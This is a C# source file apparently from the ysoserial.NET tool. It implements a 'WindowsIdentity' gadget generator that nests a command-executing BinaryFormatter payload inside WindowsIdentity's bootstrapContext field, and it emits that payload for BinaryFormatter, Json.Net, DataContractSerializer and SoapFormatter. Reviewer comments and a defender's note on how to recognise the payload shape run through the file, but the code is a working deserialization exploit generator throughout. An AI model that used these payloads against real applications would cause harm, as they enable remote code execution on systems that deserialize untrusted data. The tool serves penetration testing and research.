using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.Serialization;
using System.Security.Claims;
using System.Security.Principal;
using System.Xml;
using Newtonsoft.Json;
using System.Runtime.Serialization.Formatters.Soap;
namespace ysoserial.Generators
{
/// <summary>
/// Gadget generator that nests a BinaryFormatter payload inside a serialized
/// <see cref="WindowsIdentity"/>. The inner payload is base64-encoded and stored under the
/// "System.Security.ClaimsIdentity.bootstrapContext" member, which ClaimsIdentity's
/// deserialization constructor hands back to BinaryFormatter (see the author's notes in
/// <see cref="Description"/>). The same wrapper is emitted for four outer formatters.
/// Defender's note: across all four formats the recognisable shape is a WindowsIdentity type
/// reference whose bootstrapContext member is a base64 string; for Json.Net the "$type" hint
/// is only acted on when the consumer's TypeNameHandling is something other than None.
/// </summary>
class WindowsIdentityGenerator : GenericGenerator
{
    /// <summary>
    /// One-line description shown by the tool. The comments after the return are the
    /// author's notes on how the chain reaches BinaryFormatter inside ClaimsIdentity.
    /// </summary>
    public override string Description()
    {
        return "WindowsIdentity Gadget by Levi Broderick";
        // Bridge from BinaryFormatter constructor/callback to BinaryFormatter
        // Useful for Json.Net since it invokes ISerializable callbacks during deserialization
        // WindowsIdentity extends ClaimsIdentity
        // https://referencesource.microsoft.com/#mscorlib/system/security/claims/ClaimsIdentity.cs,60342e51e4acc828,references
        // System.Security.ClaimsIdentity.bootstrapContext is a SerializationInfo key (BootstrapContextKey)
        // added during serialization with binary formatter serialized Claims
        // protected ClaimsIdentity(SerializationInfo info, StreamingContext context)
        // private void Deserialize
        // using (MemoryStream ms = new MemoryStream(Convert.FromBase64String(info.GetString(BootstrapContextKey))))
        // m_bootstrapContext = bf.Deserialize(ms, null, false);
    }

    /// <summary>
    /// Outer formatters this generator can emit; each name has a matching branch in
    /// <see cref="Generate"/> (matched case-insensitively there).
    /// </summary>
    public override List<string> SupportedFormatters()
    {
        return new List<string> { "BinaryFormatter", "Json.Net", "DataContractSerializer", "SoapFormatter"};
    }

    /// <summary>Short gadget name used to select this generator.</summary>
    public override string Name()
    {
        return "WindowsIdentity";
    }

    /// <summary>
    /// Carrier object used only by the BinaryFormatter branch of <see cref="Generate"/>
    /// (the other formatters are written out as literal text). It implements ISerializable
    /// and, in <see cref="GetObjectData"/>, rewrites its own serialized type to WindowsIdentity,
    /// so a consumer runs WindowsIdentity/ClaimsIdentity deserialization rather than this class's.
    /// </summary>
    [Serializable]
    public class IdentityMarshal : ISerializable
    {
        /// <param name="b64payload">Base64 text of the inner BinaryFormatter stream.</param>
        public IdentityMarshal(string b64payload)
        {
            B64Payload = b64payload;
        }

        // Only read back in GetObjectData; never decoded here.
        private string B64Payload { get; }

        /// <summary>
        /// Writes the serialization record: SetType makes the stream describe a WindowsIdentity,
        /// and AddValue stores the payload under the exact key ClaimsIdentity reads as
        /// BootstrapContextKey (see the notes in Description).
        /// </summary>
        public void GetObjectData(SerializationInfo info, StreamingContext context)
        {
            info.SetType(typeof(WindowsIdentity));
            info.AddValue("System.Security.ClaimsIdentity.bootstrapContext", B64Payload);
        }
    }

    /// <summary>
    /// Builds the WindowsIdentity wrapper payload for the requested outer formatter.
    /// </summary>
    /// <param name="cmd">Command string handed unchanged to the inner TypeConfuseDelegateGenerator;
    /// what that generator does with it is defined outside this file.</param>
    /// <param name="formatter">One of the <see cref="SupportedFormatters"/> names, compared
    /// case-insensitively.</param>
    /// <param name="test">When true, the Json.Net, DataContractSerializer and SoapFormatter branches
    /// deserialize the generated text in-process right here (i.e. they trigger the chain locally);
    /// the BinaryFormatter branch just forwards the flag to the base-class Serialize.</param>
    /// <returns>Whatever the base-class Serialize returns for BinaryFormatter (not visible here; the
    /// inner call on the first line casts such a result to byte[]), otherwise the payload text as a string.</returns>
    /// <exception cref="Exception">Thrown for any other formatter name.</exception>
    public override object Generate(string cmd, string formatter, Boolean test)
    {
        // The inner gadget is generated with test == false, so nothing is deserialized at this
        // point; only the outer test branches below ever run a payload.
        Generator binaryFormatterGenerator = new TypeConfuseDelegateGenerator();
        byte[] binaryFormatterPayload = (byte[])binaryFormatterGenerator.Generate(cmd, "BinaryFormatter", false);
        string b64encoded = Convert.ToBase64String(binaryFormatterPayload);

        // NOTE(review): this branch uses an ordinal, case-insensitive compare; the three branches
        // below use ToLower().Equals, which is culture-sensitive. Same result for these ASCII
        // names, but inconsistent.
        if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase))
        {
            var obj = new IdentityMarshal(b64encoded);
            return Serialize(obj, formatter, test);
        }
        else if (formatter.ToLower().Equals("json.net"))
        {
            // Single-quoted JSON (Json.Net accepts it). The '$type' member only has an effect on a
            // consumer whose TypeNameHandling is not None.
            string payload = @"{
'$type': 'System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'System.Security.ClaimsIdentity.bootstrapContext': '" + b64encoded + @"'
}";
            if (test)
            {
                try
                {
                    // TypeNameHandling.Auto is the setting that makes the '$type' hint resolve to
                    // WindowsIdentity here; with the default (None) the hint is ignored.
                    Object obj = JsonConvert.DeserializeObject<Object>(payload, new JsonSerializerSettings
                    {
                        TypeNameHandling = TypeNameHandling.Auto
                    });
                }
                catch
                {
                    // Deliberately empty: any exception from the local deserialization is
                    // discarded, so test mode reports nothing either way.
                }
            }
            return payload;
        }
        else if (formatter.ToLower().Equals("datacontractserializer"))
        {
            // The root element's 'type' attribute is read back by the test branch to choose the
            // deserialization type, mirroring a consumer that trusts a type name from the document.
            string payload = $@"<root xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" type=""System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<WindowsIdentity xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Security.Principal"">
<System.Security.ClaimsIdentity.bootstrapContext i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.bootstrapContext>
</WindowsIdentity>
</root>
";
            if (test)
            {
                try
                {
                    var xmlDoc = new XmlDocument();
                    xmlDoc.LoadXml(payload);
                    XmlElement xmlItem = (XmlElement)xmlDoc.SelectSingleNode("root");
                    // Type.GetType on a name taken from the document; presumably returns null for an
                    // unresolvable name, in which case the serializer constructor throws and the
                    // catch below swallows it. The XmlTextReader is never disposed (test-only code).
                    var s = new DataContractSerializer(Type.GetType(xmlItem.GetAttribute("type")));
                    var d = s.ReadObject(new XmlTextReader(new StringReader(xmlItem.InnerXml)));
                }
                catch
                {
                    // Deliberately empty, as in the Json.Net branch.
                }
            }
            return payload;
        }
        else if (formatter.ToLower().Equals("soapformatter"))
        {
            string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
<SOAP-ENV:Body>
<a1:WindowsIdentity id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<System.Security.ClaimsIdentity.bootstrapContext xsi:type=""xsd:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.bootstrapContext>
</a1:WindowsIdentity>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
";
            if (test)
            {
                try
                {
                    // ASCII is sufficient: the envelope text and the base64 body are both 7-bit.
                    // Neither the MemoryStream nor the formatter is disposed (test-only code).
                    byte[] byteArray = System.Text.Encoding.ASCII.GetBytes(payload);
                    MemoryStream ms = new MemoryStream(byteArray);
                    SoapFormatter sf = new SoapFormatter();
                    sf.Deserialize(ms);
                }
                catch
                {
                    // Deliberately empty, as in the Json.Net branch.
                }
            }
            return payload;
        }
        else
        {
            // NOTE(review): a NotSupportedException or ArgumentException would be more specific
            // than the bare Exception; left as-is here since callers catching Exception rely on it.
            throw new Exception("Formatter not supported");
        }
    }
}
}